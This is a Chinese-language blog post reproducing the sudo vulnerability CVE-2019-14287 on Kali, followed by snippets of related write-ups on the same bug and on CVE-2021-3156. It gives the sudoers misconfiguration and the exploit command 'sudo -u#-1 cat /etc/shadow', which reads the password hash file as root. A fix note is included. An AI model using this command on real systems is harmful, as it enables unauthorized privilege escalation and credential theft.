實驗環境
kali
影響範圍
sudo 1.8.28之前的所有版本
復現過程
首先看一下自身kali的sudo版本,命令:sudo -v
符合條件,接下來需要新建乙個test使用者,命令:useradd test passwd test
然後vi進入sudoers,命令:vi /etc/sudoers
在root all=(all:all) all下新增test使用者的配置:test all=(all.!root) all
然後:!wq強制儲存退出
test 指的是test使用者
第乙個all表示使用者可以在任何地方使用sudo
第二個(all,!root)表示命令可以被除了root以外的任何使用者執行
最後乙個all表示被允許執行
接著用test使用者登入,命令:su test
系統提示許可權不夠
然後使用命令:sudo -u#-1 cat/etc/shadow
讀取成功。
修復建議
更新sudo版本至1.8.28以上
CVE 2019 14287 漏洞復現
etc sudoers檔案配置不當,導致使用者可以繞過安全策略,以root身份執行命令。預設情況下的linux,不會遭受此攻擊 開啟linux中 etc sudoers,預設情況下如下圖所示。這是什麼意思呢?如果這樣配置,就允許test使用者以非root使用者之外的所有使用者許可權執行id這個命令。...
sudo提權復現(CVE 2019 14187)
2019年10月14日,cve官方發布了cve 2019 14287的漏洞預警。其中包含sudo root許可權繞過漏洞 cve 2019 14287 的補丁修復。通過特定payload,使用者可提公升至root許可權。利用前提 sudo v 1.8.28 知道當前使用者的密碼 當前使用者存在於su...
CVE 2021 3156 sudo許可權提公升漏洞
漏洞詳情 sudo是乙個功能強大的工具,其允許普通使用者執行root許可權命令,大多數基於unix和linux的作業系統都包含sudo。2021年01月26日,sudo被披露存在乙個基於堆的緩衝區溢位漏洞 cve 2021 3156,該漏洞被命名為 baron samedit 可導致本地許可權提公升...